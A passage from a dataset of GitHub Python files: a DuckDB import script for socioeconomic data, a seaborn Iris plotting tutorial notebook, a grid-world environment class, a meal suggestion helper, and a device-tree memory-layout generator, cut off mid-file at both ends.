pd\n\nfrom lakehouse_ufba.params import DuckDBFile, RawFiles\nfrom lakehouse_ufba.utils import insert_pandas_df_into_duckdb, log\n\n\ndef read_socioeconomic(file_path: str | Path) -> pd.DataFrame:\n return pd.read_spss(file_path)\n\n\ndef pre_clean_socioeconomic_df(df_socioeconomic: pd.DataFrame) -> pd.DataFrame:\n # drop \"filter_$\" column\n if \"filter_$\" in df_socioeconomic.columns:\n df_socioeconomic = df_socioeconomic.drop(columns=\"filter_$\")\n \n # all columns to lowercase\n df_socioeconomic = df_socioeconomic.rename(columns=lambda x: x.lower())\n \n # convert \"insrica\" and \"cpf\" to str\n for column in [\"inscrica\", \"cpf\"]:\n if column in df_socioeconomic.columns:\n df_socioeconomic[column] = df_socioeconomic[column].astype(str)\n \n columns_to_test_for_dups = [\"ano\", \"inscrica\", \"area\", \"curso\"]\n \n if \"cpf\" in df_socioeconomic.columns:\n columns_to_test_for_dups = columns_to_test_for_dups + ['cpf']\n \n df_socioeconomic = df_socioeconomic.drop_duplicates(subset=columns_to_test_for_dups)\n \n return df_socioeconomic\n\n\n@log(log_file=\"logs/import_ufba_bronze_socioeco.log\")\ndef import_socioeconomic_to_ufba_bronze(\n duckdb_path: Path,\n socioeconomic_path: Path\n) -> None:\n # looping over socieconomic files \n for socioeconomic_file in socioeconomic_path:\n # getting table names\n table_name = socioeconomic_file.split(\"/\")[-1].split(\".\")[0].lower()\n \n # read the file\n df = read_socioeconomic(file_path=socioeconomic_file)\n df = pre_clean_socioeconomic_df(df_socioeconomic=df)\n insert_pandas_df_into_duckdb(\n df=df,\n duckdb_path=duckdb_path,\n schema=\"ufba_bronze\",\n table=table_name\n )\n \n\nif __name__ == \"__main__\":\n import_socioeconomic_to_ufba_bronze(\n duckdb_path=DuckDBFile.DUCKDB,\n socioeconomic_path=RawFiles.SOCIOECONOMIC\n )\n\n","repo_name":"silasge/lakehouse-ufba","sub_path":"lakehouse_ufba/ufba_bronze/socioeconomic/import_socioeconomic_files.py","file_name":"import_socioeconomic_files.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10146517185","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# I have created this Kernel for beginners who want to learn how to plot graphs with seaborn.This kernel is still a work in progress.I will be updating it further when I find some time.If you find my work useful please fo vote by clicking at the top of the page.Thanks for viewing\n\n# In[ ]:\n\n\n# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\n\n# **Importing pandas and Seaborn module**\n\n# In[ ]:\n\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nplt.style.use('fivethirtyeight') \nimport warnings\nwarnings.filterwarnings('ignore') #this will ignore the warnings.it wont display warnings in notebook\n\n# **Importing Iris data set**\n\n# In[ ]:\n\n\niris=pd.read_csv('../input/Iris.csv')\n\n# **Displaying data **\n\n# In[ ]:\n\n\niris.head()\n\n# In[ ]:\n\n\niris.drop('Id',axis=1,inplace=True)\n\n# **Checking if there are any missing values **\n\n# In[ ]:\n\n\niris.info()\n\n# In[ ]:\n\n\niris['Species'].value_counts()\n\n# This data set has three varities of Iris plant.\n\n# **1. Describing the data**\n\n# In[ ]:\n\n\niris.describe().plot(kind = \"area\",fontsize=27, figsize = (20,8), table = True,colormap=\"rainbow\")\nplt.xlabel('Statistics',)\nplt.ylabel('Value')\nplt.title(\"General Statistics of Iris Dataset\")\n\n# Above plot gives us a General Idea about the dataset.\n\n# **2.Bar Plot :**\n# Here the frequency of the observation is plotted.In this case we are plotting the frequency of the three species in the Iris Dataset\n\n# In[ ]:\n\n\n#f,ax=plt.subplots(1,2,figsize=(18,8))\nsns.countplot('Species',data=iris)\n#ax.set_title('Iris Species Count')\nplt.show()\n\n# **3. Pie Chart :**\n# \n\n# In[ ]:\n\n\n#f,ax=plt.subplots(1,2,figsize=(18,8))\niris['Species'].value_counts().plot.pie(explode=[0.1,0.1,0.1],autopct='%1.1f%%',shadow=True,figsize=(10,8))\n#iris['Species'].value_counts().plot.pie(explode=[0.1,0.1,0.1],autopct='%1.1f%%',ax=ax[0],shadow=True)\n#ax[0].set_title('Iris Species Count')\n#ax[0].set_ylabel('Count')\n#sns.countplot('Species',data=iris,ax=ax[1])\n#ax[1].set_title('Iris Species Count')\nplt.show()\n\n\n# We can see that there are 50 samples each of all the Iris Species in the data set.\n\n# **4. Joint plot: **\n# Jointplot is seaborn library specific and can be used to quickly visualize and analyze the relationship between two variables and describe their individual distributions on the same plot.\n\n# In[ ]:\n\n\nfig=sns.jointplot(x='SepalLengthCm',y='SepalWidthCm',data=iris)\n\n# In[ ]:\n\n\nsns.jointplot(\"SepalLengthCm\", \"SepalWidthCm\", data=iris, kind=\"reg\")\n\n# In[ ]:\n\n\nfig=sns.jointplot(x='SepalLengthCm',y='SepalWidthCm',kind='hex',data=iris)\n\n# In[ ]:\n\n\nsns.jointplot(\"SepalLengthCm\", \"SepalWidthCm\", data=iris, kind=\"kde\",space=0,color='g')\n\n# In[ ]:\n\n\ng = (sns.jointplot(\"SepalLengthCm\", \"SepalWidthCm\",data=iris, color=\"k\").plot_joint(sns.kdeplot, zorder=0, n_levels=6))\n\n# **5. FacetGrid Plot**\n\n# In[ ]:\n\n\nimport matplotlib.pyplot as plt\nsns.FacetGrid(iris,hue='Species',size=5)\\\n.map(plt.scatter,'SepalLengthCm','SepalWidthCm')\\\n.add_legend()\n\n# **6. Boxplot or Whisker plot**\n# Box plot was was first introduced in year 1969 by Mathematician John Tukey.Box plot give a statical summary of the features being plotted.Top line represent the max value,top edge of box is third Quartile, middle edge represents the median,bottom edge represents the first quartile value.The bottom most line respresent the minimum value of the feature.The height of the box is called as Interquartile range.The black dots on the plot represent the outlier values in the data.\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.boxplot(x='Species',y='PetalLengthCm',data=iris,order=['Iris-virginica','Iris-versicolor','Iris-setosa'],linewidth=2.5,orient='v',dodge=False)\n\n# In[ ]:\n\n\n#iris.drop(\"Id\", axis=1).boxplot(by=\"Species\", figsize=(12, 6))\niris.boxplot(by=\"Species\", figsize=(12, 6))\n\n# **7. Strip plot**\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.stripplot(x='Species',y='SepalLengthCm',data=iris,jitter=True,edgecolor='gray',size=8,palette='winter',orient='v')\n\n# **8. Combining Box and Strip Plots**\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.boxplot(x='Species',y='SepalLengthCm',data=iris)\nfig=sns.stripplot(x='Species',y='SepalLengthCm',data=iris,jitter=True,edgecolor='gray')\n\n# In[ ]:\n\n\nax= sns.boxplot(x=\"Species\", y=\"PetalLengthCm\", data=iris)\nax= sns.stripplot(x=\"Species\", y=\"PetalLengthCm\", data=iris, jitter=True, edgecolor=\"gray\")\n\nboxtwo = ax.artists[2]\nboxtwo.set_facecolor('yellow')\nboxtwo.set_edgecolor('black')\nboxthree=ax.artists[1]\nboxthree.set_facecolor('red')\nboxthree.set_edgecolor('black')\nboxthree=ax.artists[0]\nboxthree.set_facecolor('green')\nboxthree.set_edgecolor('black')\n\nplt.show()\n\n# **9. Violin Plot**\n# It is used to visualize the distribution of data and its probability distribution.This chart is a combination of a Box Plot and a Density Plot that is rotated and placed on each side, to show the distribution shape of the data. The thick black bar in the centre represents the interquartile range, the thin black line extended from it represents the 95% confidence intervals, and the white dot is the median.Box Plots are limited in their display of the data, as their visual simplicity tends to hide significant details about how values in the data are distributed\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.violinplot(x='Species',y='SepalLengthCm',data=iris)\n\n# In[ ]:\n\n\nplt.figure(figsize=(15,10))\nplt.subplot(2,2,1)\nsns.violinplot(x='Species',y='PetalLengthCm',data=iris)\nplt.subplot(2,2,2)\nsns.violinplot(x='Species',y='PetalWidthCm',data=iris)\nplt.subplot(2,2,3)\nsns.violinplot(x='Species',y='SepalLengthCm',data=iris)\nplt.subplot(2,2,4)\nsns.violinplot(x='Species',y='SepalWidthCm',data=iris)\n\n# **10. Pair Plot:**\n# A “pairs plot” is also known as a scatterplot, in which one variable in the same data row is matched with another variable's value, like this: Pairs plots are just elaborations on this, showing all variables paired with all the other variables.\n\n# In[ ]:\n\n\nsns.pairplot(data=iris,kind='scatter')\n\n# In[ ]:\n\n\nsns.pairplot(iris,hue='Species')\n\n# **11. Heat map**\n# Heat map is used to find out the correlation between different features in the dataset.High positive or negative value shows that the features have high correlation.This helps us to select the parmeters for machine learning.\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.heatmap(iris.corr(),annot=True,cmap='cubehelix',linewidths=1,linecolor='k',square=True,mask=False, vmin=-1, vmax=1,cbar_kws={\"orientation\": \"vertical\"},cbar=True)\n\n# **12. Distribution plot:**\n# The distribution plot is suitable for comparing range and distribution for groups of numerical data. Data is plotted as value points along an axis. You can choose to display only the value points to see the distribution of values, a bounding box to see the range of values, or a combination of both as shown here.The distribution plot is not relevant for detailed analysis of the data as it deals with a summary of the data distribution.\n\n# In[ ]:\n\n\niris.hist(edgecolor='black', linewidth=1.2)\nfig=plt.gcf()\nfig.set_size_inches(12,6)\n\n# **13. Swarm plot**\n# It looks a bit like a friendly swarm of bees buzzing about their hive. More importantly, each data point is clearly visible and no data are obscured by overplotting.A beeswarm plot improves upon the random jittering approach to move data points the minimum distance away from one another to avoid overlays. The result is a plot where you can see each distinct data point, like shown in below plot\n# \n# \n# \n\n# In[ ]:\n\n\nsns.set(style=\"darkgrid\")\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig = sns.swarmplot(x=\"Species\", y=\"PetalLengthCm\", data=iris)\n\n# **14. Box and Swarm plot combined**\n\n# In[ ]:\n\n\nsns.set(style=\"darkgrid\")\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig= sns.boxplot(x=\"Species\", y=\"PetalLengthCm\", data=iris, whis=np.inf)\nfig= sns.swarmplot(x=\"Species\", y=\"PetalLengthCm\", data=iris, color=\".2\")\n\n# **15. Swarm and Violin plot combined**\n\n# In[ ]:\n\n\nsns.set(style=\"whitegrid\")\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nax = sns.violinplot(x=\"Species\", y=\"PetalLengthCm\", data=iris, inner=None)\nax = sns.swarmplot(x=\"Species\", y=\"PetalLengthCm\", data=iris,color=\"white\", edgecolor=\"black\")\n\n# **16. Species based classification**\n\n# In[ ]:\n\n\nsns.set(style=\"darkgrid\")\nsc=iris[iris.Species=='Iris-setosa'].plot(kind='scatter',x='SepalLengthCm',y='SepalWidthCm',color='red',label='Setosa')\niris[iris.Species=='Iris-versicolor'].plot(kind='scatter',x='SepalLengthCm',y='SepalWidthCm',color='green',label='Versicolor',ax=sc)\niris[iris.Species=='Iris-virginica'].plot(kind='scatter',x='SepalLengthCm',y='SepalWidthCm',color='orange', label='virginica', ax=sc)\nsc.set_xlabel('Sepal Length in cm')\nsc.set_ylabel('Sepal Width in cm')\nsc.set_title('Sepal Length Vs Sepal Width')\nsc=plt.gcf()\nsc.set_size_inches(10,6)\n\n# **17. LM PLot**\n\n# In[ ]:\n\n\nfig=sns.lmplot(x=\"PetalLengthCm\", y=\"PetalWidthCm\",data=iris)\n\n# **18. FacetGrid**\n\n# In[ ]:\n\n\nsns.FacetGrid(iris, hue=\"Species\", size=6) \\\n .map(sns.kdeplot, \"PetalLengthCm\") \\\n .add_legend()\nplt.ioff() \n\n# **19. Andrews Curve:**\n# In data visualization, an Andrews plot or Andrews curve is a way to visualize structure in high-dimensional data. It is basically a rolled-down, non-integer version of the Kent–Kiviat radar m chart, or a smoothened version of a parallel coordinate plot.In Pandas use Andrews Curves to plot and visualize data structure.Each multivariate observation is transformed into a curve and represents the coefficients of a Fourier series.This useful for detecting outliers in times series data.Use colormap to change the color of the curves\n\n# In[ ]:\n\n\nfrom pandas.tools.plotting import andrews_curves\nandrews_curves(iris,\"Species\",colormap='rainbow')\nplt.show()\nplt.ioff()\n\n# **20. Parallel coordinate plot:**\n# This type of visualisation is used for plotting multivariate, numerical data. Parallel Coordinates Plots are ideal for comparing many variables together and seeing the relationships between them. For example, if you had to compare an array of products with the same attributes (comparing computer or cars specs across different models).\n\n# In[ ]:\n\n\nfrom pandas.tools.plotting import parallel_coordinates\nparallel_coordinates(iris, \"Species\")\n\n# **21. Radviz Plot**\n# RadViz Visualizer. RadViz is a multivariate data visualization algorithm that plots each feature dimension uniformly around the circumference of a circle then plots points on the interior of the circle such that the point normalizes its values on the axes from the center to each arc.\n\n# In[ ]:\n\n\nfrom pandas.tools.plotting import radviz\nradviz(iris, \"Species\")\n\n# ** 22. Factor Plot **\n\n# In[ ]:\n\n\n#f,ax=plt.subplots(1,2,figsize=(18,8))\nsns.factorplot('Species','SepalLengthCm',data=iris)\nplt.ioff()\nplt.show()\n#sns.factorplot('Species','SepalLengthCm',data=iris,ax=ax[0][0])\n#sns.factorplot('Species','SepalWidthCm',data=iris,ax=ax[0][1])\n#sns.factorplot('Species','PetalLengthCm',data=iris,ax=ax[1][0])\n#sns.factorplot('Species','PetalWidthCm',data=iris,ax=ax[1][1])\n\n# ** 23. Boxen Plot**|\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.boxenplot(x='Species',y='SepalLengthCm',data=iris)\n\n# **24.Residual Plot :**\n# The most useful way to plot the residuals, though, is with your predicted values on the x-axis, and your residuals on the y-axis. The distance from the line at 0 is how bad the prediction was for that value.\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.residplot('SepalLengthCm', 'SepalWidthCm',data=iris,lowess=True)\n\n# **25.Venn Diagram :**\n# A Venn diagram (also called primary diagram, set diagram or logic diagram) is a diagram that shows all possible logical relations between a finite collection of different sets. Each set is represented by a circle. The circle size represents the importance of the group. The groups are usually overlapping: the size of the overlap represents the intersection between both groups.\n\n# In[ ]:\n\n\n# venn2\nfrom matplotlib_venn import venn2\nsepal_length = iris.iloc[:,0]\nsepal_width = iris.iloc[:,1]\npetal_length = iris.iloc[:,2]\npetal_width = iris.iloc[:,3]\n# First way to call the 2 group Venn diagram\nvenn2(subsets = (len(sepal_length)-15, len(sepal_width)-15, 15), set_labels = ('sepal_length', 'sepal_width'))\nplt.show()\n\n# **26. Spider Graph **\n\n# In[ ]:\n\n\nfrom math import pi\ncategories = list(iris)[:4]\nN = len(categories)\nangles = [ n / float(N)*2*pi for n in range(N)]\nangles = angles + angles[:1]\nplt.figure(figsize = (10,10))\nax = plt.subplot(111,polar = True)\nax.set_theta_offset(pi/2)\nax.set_theta_direction(-1)\nplt.xticks(angles[:-1],categories)\nax.set_rlabel_position(0)\nplt.yticks([0,2,4,6],[\"0\",\"2\",\"4\",\"6\"],color= \"red\", size = 7)\nplt.ylim(0,6)\n\nvalues = iris.loc[0].drop(\"Species\").values.flatten().tolist()\nvalues = values + values[:1]\nax.plot(angles,values,linewidth = 1,linestyle=\"solid\",label =\"setosa\" )\nax.fill(angles,values,\"b\",alpha=0.1)\n\nvalues = iris.loc[1].drop(\"Species\").values.flatten().tolist()\nvalues = values + values[:1]\nax.plot(angles,values,linewidth = 1,linestyle=\"solid\",label =\"versicolor\" )\nax.fill(angles,values,\"orange\",alpha=0.1)\nplt.legend(loc = \"upper left\",bbox_to_anchor = (0.1,0.1))\nplt.show()\n\n# In[ ]:\n\n\n\n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample268.py","file_name":"sample268.py","file_ext":"py","file_size_in_byte":13844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24738406087","text":"import numpy as np\nfrom enum import IntEnum\n\nfrom skimage.draw import line as raytrace\n\n\nclass GridStatus(IntEnum):\n EMPTY = 0\n OBSTACLE = 1\n TARGET = 2\n AGENT = 3\n BOTH = 4\n PREV_AGENT = 5\n\nclass ScanStatus(IntEnum):\n OUT_OF_BOUNDS = -2\n OBSTRUCTED = -1\n EMPTY = 0\n OBSTACLE = 1\n TARGET = 2\n AGENT = 3\n BOTH = 4\n\nclass Direction(IntEnum):\n UP = 0\n DOWN = 1\n LEFT = 2\n RIGHT = 3\n UP_LEFT = 4\n UP_RIGHT = 5\n DOWN_LEFT = 6\n DOWN_RIGHT = 7\n\nVec2Dir = {\n (-1,0): Direction.UP,\n (1,0): Direction.DOWN,\n (0,-1): Direction.LEFT,\n (0,1): Direction.RIGHT,\n (-1,-1): Direction.UP_LEFT,\n (-1,1): Direction.UP_RIGHT,\n (1,-1): Direction.DOWN_LEFT,\n (1,1): Direction.DOWN_RIGHT,\n}\n\nDir2Vec = {\n Direction.UP: np.array([-1,0]),\n Direction.DOWN: np.array([1,0]),\n Direction.LEFT: np.array([0,-1]),\n Direction.RIGHT: np.array([0,1]),\n Direction.UP_LEFT: np.array([-1,-1]),\n Direction.UP_RIGHT: np.array([-1,1]),\n Direction.DOWN_LEFT: np.array([1,-1]),\n Direction.DOWN_RIGHT: np.array([1,1]),\n}\n\n\nclass Grid(object):\n '''\n Grid that represents the environment.\n Core data structure is a 2D array.\n '''\n def __init__(self,grid_size) -> None:\n self._grid = np.zeros((grid_size),dtype=int)\n self.agent_pos = None\n self.target_pos = None\n\n def size(self) -> tuple:\n return self._grid.shape\n\n def get_cell(self,pos) -> GridStatus:\n return self._grid[pos]\n\n def agent_reached_target(self) -> None:\n return np.sum(np.abs(self.agent_pos - self.target_pos)) == 0\n\n def in_bounds(self,coord) -> bool:\n return coord[0] >= 0 and coord[0] < self._grid.shape[0] and coord[1] >= 0 and coord[1] < self._grid.shape[1]\n\n def not_obstacle(self,coord) -> bool:\n return self._grid[coord[0],coord[1]] != GridStatus.OBSTACLE\n\n def set_obstacle(self, ind_slices) -> None:\n '''\n Pass in a tuple of slice objects\n slice(start,stop,step)\n '''\n self._grid[ind_slices] = GridStatus.OBSTACLE\n\n def fill_random_grid(self, probability) -> None:\n sample = np.random.random_sample(self._grid.shape)\n obs = sample < probability\n self._grid[obs==True] = GridStatus.OBSTACLE\n self._grid[obs==False] = GridStatus.EMPTY\n # self.place_target(self.target_pos, force=True)\n # self.place_agent(self.agent_pos, force=True)\n\n def set_random_target(self) -> None:\n self.target_pos = np.zeros((2), dtype=int)\n self.target_pos[0] = np.random.randint(0,self._grid.shape[0])\n self.target_pos[1] = np.random.randint(0,self._grid.shape[1])\n self.place_target(self.target_pos, force=True)\n\n def set_random_agent(self) -> None:\n self.agent_pos = np.zeros((2), dtype=int)\n self.agent_pos[0] = np.random.randint(0,self._grid.shape[0])\n self.agent_pos[1] = np.random.randint(0,self._grid.shape[1])\n self.place_agent(self.agent_pos, force=True)\n\n def place_agent(self,pos,force=False) -> bool:\n # force allows us to override obstacles\n row = pos[0]\n col = pos[1]\n if self.in_bounds((row,col)) and (force or self.not_obstacle((row,col))):\n if self.agent_pos is not None:\n self._grid[self.agent_pos[0], self.agent_pos[1]] = GridStatus.PREV_AGENT\n if self._grid[row,col] == GridStatus.TARGET:\n self._grid[row,col] = GridStatus.BOTH\n else:\n self._grid[row,col] = GridStatus.AGENT\n self.agent_pos = np.array([row,col])\n return True\n else:\n return False\n\n def place_target(self,pos,force=False) -> None:\n row = pos[0]\n col = pos[1]\n if self.in_bounds((row,col)) and (force or self.not_obstacle((row,col))):\n if self.target_pos is not None:\n self._grid[self.target_pos[0], self.target_pos[1]] = GridStatus.EMPTY\n if self._grid[row,col] == GridStatus.AGENT:\n self._grid[row,col] = GridStatus.BOTH\n else:\n self._grid[row,col] = GridStatus.TARGET\n self.target_pos = np.array([row,col])\n return True\n else:\n return False\n\n def agent_move(self,dir) -> bool:\n coord = self.agent_pos + np.array(Dir2Vec[dir])\n if self.in_bounds(coord) and self.not_obstacle(coord):\n return self.place_agent(coord)\n else:\n return False\n\n def scan_cells(self,area) -> list:\n '''\n Takes in a list of coordinate offsets, centered around the agent.\n Return the status of each coordinate.\n The status can be EMPTY or OBSTACLE or TARGET or BOTH\n '''\n result = []\n for offset in area:\n coord = self.agent_pos + np.array(offset)\n if not self.in_bounds(coord) or self._grid[coord[0],coord[1]] == GridStatus.OBSTACLE:\n result.append((offset, ScanStatus.OBSTACLE))\n elif self._grid[coord[0],coord[1]] == GridStatus.EMPTY or self._grid[coord[0],coord[1]] == GridStatus.PREV_AGENT:\n result.append((offset, ScanStatus.EMPTY))\n elif self._grid[coord[0],coord[1]] == GridStatus.AGENT:\n result.append((offset, ScanStatus.AGENT))\n elif self._grid[coord[0],coord[1]] == GridStatus.TARGET:\n result.append((offset, ScanStatus.TARGET))\n elif self._grid[coord[0],coord[1]] == GridStatus.BOTH:\n result.append((offset, ScanStatus.BOTH))\n return result\n\n def scan_cone(self,cone_ends) -> list:\n '''\n Takes in a list of coordinates, representing the endpoints of a cone centered around the agent.\n Return the status of each coordinate.\n The status can be EMPTY or OBSTACLE or AGENT or TARGET or BOTH.\n \n This works by performing ray tracing, starting from the agent pos, ending at each endpoint.\n The ray will stop at the first cell is that is TARGET or OBSTACLE.\n All cells before this cell will be EMPTY.\n Return nothing for cells after the obstacle since agent can not see it.\n '''\n result = {}\n for end_offset in cone_ends:\n endpoints = self.agent_pos + np.array(end_offset)\n ray_cc, ray_rr = raytrace(self.agent_pos[0], self.agent_pos[1], endpoints[0], endpoints[1])\n for c, r in zip(ray_cc, ray_rr):\n coord = (c,r)\n offset = (c - self.agent_pos[0], r - self.agent_pos[1])\n if not self.in_bounds(coord) or self._grid[coord[0],coord[1]] == GridStatus.OBSTACLE:\n result[coord] = (offset, ScanStatus.OBSTACLE)\n break\n elif self._grid[coord[0],coord[1]] == GridStatus.TARGET:\n result[coord] = (offset, ScanStatus.TARGET)\n break\n elif self._grid[coord[0],coord[1]] == GridStatus.BOTH:\n result[coord] = (offset, ScanStatus.BOTH)\n break\n elif not (coord in result):\n if self._grid[coord[0],coord[1]] == GridStatus.EMPTY or self._grid[coord[0],coord[1]] == GridStatus.PREV_AGENT:\n result[coord] = (offset, ScanStatus.EMPTY)\n elif self._grid[coord[0],coord[1]] == GridStatus.AGENT:\n result[coord] = (offset, ScanStatus.AGENT)\n \n result_list = [val for val in result.values()]\n return result_list\n\n def relative_target_pos(self) -> None:\n '''\n Returns the position of the target relative to the agent.\n '''\n return self.target_pos - self.agent_pos\n\n def translate_path_to_world_frame(self, path) -> np.ndarray:\n return path + self.agent_pos\n\n def print_grid(self) -> None:\n for i in range(self._grid.shape[0]):\n print(self._grid[i])\n\n\nif __name__ == \"__main__\":\n G = Grid((10,10))\n print(\"Initialization\")\n G.print_grid()\n G.place_agent((3,3))\n G.place_target((2,2))\n print(\"After placement\")\n G.print_grid()\n G.agent_move(Direction.UP)\n print(\"After agent move\")\n G.print_grid()\n","repo_name":"ben441318936/PlanningAndControl","sub_path":"GridWorld/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":8248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74534571046","text":"import random\nimport views\n\n\ndef choose_dinner(selectmeal, selections):\n meal_list = []\n no_recipe = str('No recipes for this selection available. Contribute!')\n try:\n if selections == \"comfortfood\":\n mealtime_filter = views.models.FoodMood.query.filter_by(meal=selectmeal, comfortfood=True).all()\n for dish in mealtime_filter:\n name = dish.name\n meal_list.append(name)\n elif selections == \"fish\":\n mealtime_filter = views.models.FoodMood.query.filter_by(meal=selectmeal, fish=True).all()\n for dish in mealtime_filter:\n name = dish.name\n meal_list.append(name)\n else:\n mealtime_filter = views.models.FoodMood.query.filter_by(meal=selectmeal).all()\n for dish in mealtime_filter:\n name = dish.name\n meal_list.append(name)\n suggestion = random.choice(meal_list)\n return suggestion\n except IndexError:\n return no_recipe\n\n\ndef select_url(suggestion):\n meal = views.models.FoodMood.query.filter_by(name=suggestion).first()\n try:\n url = meal.recipe\n return url\n except AttributeError:\n pass\n\n\n# convert url in correct form\ndef url_convert(recipe):\n if recipe.startswith(\"http://\") or recipe.startswith(\"https://\"):\n return recipe\n else:\n recipe_upd = \"http://\" + recipe\n return recipe_upd\n\n\n","repo_name":"vaidadry/playground-web","sub_path":"foodmood.py","file_name":"foodmood.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29399425582","text":"#!/usr/bin/env python3\nimport math\n\nprog_slots = 16\nprog_size = 4 * 1024 * 1024\n\ndata_slots = 12\ndata_size = 1024 * 1024 * 1024\n\nhigh_counter = 0x10\nlow_counter = 0x0\n\nddr_size = 16 * 1024 * 1024 * 1024\nddr0_high = 0x10\nddr0_low = 0x0\n\nbar_size = 32 * 1024 * 1024\nbar_high = 0x0\nbar_low = 0x10000000\n\nshared_size = 1024 * 1024 * 1024 * 2\ncma_size = 1024 * 1024 * 1024\n\ndts = \"/ {\\n\"\ndts += \" memory {\\n\"\ndts += \" device_type = \\\"memory\\\";\\n\"\ndts += f\" reg = <0x0 0x0 0x0 0x7ff00000>, <{hex(ddr0_high)} {hex(ddr0_low)} {hex(math.floor(ddr_size / 0x100000000))} {hex(ddr_size % 0x100000000)}>;\\n\"\ndts += \" };\\n\\n\"\n\ndts += \" reserved-memory {\\n\"\ndts += \" #address-cells = <2>;\\n\"\ndts += \" #size-cells = <2>;\\n\"\ndts += \" ranges;\\n\\n\"\n\ndts += f\" delilah_bar: delilah@0 {{\\n\"\ndts += \" compatible = \\\"shared-dma-pool\\\";\\n\"\ndts += \" reusable;\\n\"\ndts += f\" reg = <{hex(bar_high)} {hex(bar_low)} 0x0 {hex(bar_size)}>;\\n\"\ndts += f\" label = \\\"delilah_bar\\\";\\n\"\ndts += \" };\\n\\n\"\n\nfor i in range(prog_slots):\n dts += f\" delilah_p{i}: delilah@p{i} {{\\n\"\n dts += \" compatible = \\\"shared-dma-pool\\\";\\n\"\n dts += \" reusable;\\n\" # no-map for DMA, reusable for CMA\n dts += f\" reg = <{hex(high_counter)} {hex(low_counter)} 0x0 {hex(prog_size)}>;\\n\"\n dts += f\" label = \\\"delilah_p{i}\\\";\\n\"\n dts += \" };\\n\\n\"\n\n low_counter += prog_size\n if low_counter >= 0x100000000:\n low_counter = low_counter - 0x100000000\n high_counter += 1\n\nfor i in range(data_slots):\n dts += f\" delilah_d{i}: delilah@d{i} {{\\n\"\n dts += \" compatible = \\\"shared-dma-pool\\\";\\n\"\n dts += \" reusable;\\n\" # no-map for DMA, reusable for CMA\n dts += f\" reg = <{hex(high_counter)} {hex(low_counter)} 0x0 {hex(data_size)}>;\\n\"\n dts += f\" label = \\\"delilah_d{i}\\\";\\n\"\n dts += \" };\\n\\n\"\n\n low_counter += data_size\n if low_counter >= 0x100000000:\n low_counter = low_counter - 0x100000000\n high_counter += 1\n\ndts += \" delilah_s0: delilah@s0 {\\n\"\ndts += \" compatible = \\\"shared-dma-pool\\\";\\n\"\ndts += \" reusable;\\n\" # no-map for DMA, reusable for CMA\ndts += f\" reg = <{hex(high_counter)} {hex(low_counter)} 0x0 {hex(shared_size)}>;\\n\"\ndts += f\" label = \\\"delilah_s0\\\";\\n\"\ndts += \" };\\n\\n\"\n\nlow_counter += shared_size\nif low_counter >= 0x100000000:\n low_counter = low_counter - 0x100000000\n high_counter += 1\n\ndts += \" cma0: cma@0 {\\n\"\ndts += \" compatible = \\\"shared-dma-pool\\\";\\n\"\ndts += \" reusable;\\n\"\ndts += f\" reg = <{hex(high_counter)} {hex(low_counter)} 0x0 {hex(cma_size)}>;\\n\"\ndts += \" linux,cma-default;\\n\"\ndts += \" };\\n\\n\"\n\nlow_counter += cma_size\nif low_counter >= 0x100000000:\n low_counter = low_counter - 0x100000000\n high_counter += 1\n\nddr_left_high = math.floor((ddr_size - (data_size * data_slots) - (prog_size * prog_slots) - cma_size - shared_size) / 0x100000000)\nddr_left_low = math.floor((ddr_size - (data_size * data_slots) - (prog_size * prog_slots) - cma_size - shared_size) % 0x100000000)\n\ndts += \" ddr_rest {\\n\"\ndts += f\" reg = <{hex(high_counter)} {hex(low_counter)} {hex(ddr_left_high)} {hex(ddr_left_low)}>;\\n\"\ndts += \" };\\n\\n\"\n\ndts += \" };\\n\\n\"\n\ndts += \" udma_bar {\\n\"\ndts += \" compatible = \\\"ikwzm,u-dma-buf\\\";\\n\"\ndts += \" device-name = \\\"delilah_bar0\\\";\\n\"\ndts += f\" size = <0x0 {hex(bar_size)}>;\\n\"\ndts += \" memory-region = <&delilah_bar>;\\n\"\ndts += \" dma-coherent;\\n\"\ndts += \" sync-mode = <3>;\\n\"\ndts += \" };\\n\\n\"\n\nfor i in range(prog_slots):\n dts += f\" udma_p{i} {{\\n\"\n dts += \" compatible = \\\"ikwzm,u-dma-buf\\\";\\n\"\n dts += f\" device-name = \\\"delilah_prog{i}\\\";\\n\"\n dts += f\" size = <0x0 {hex(prog_size)}>;\\n\"\n dts += f\" memory-region = <&delilah_p{i}>;\\n\"\n dts += \" sync-mode = <1>;\\n\"\n dts += \" dma-mask = <64>;\\n\"\n dts += \" };\\n\\n\"\n\nfor i in range(data_slots):\n dts += f\" udma_d{i} {{\\n\"\n dts += \" compatible = 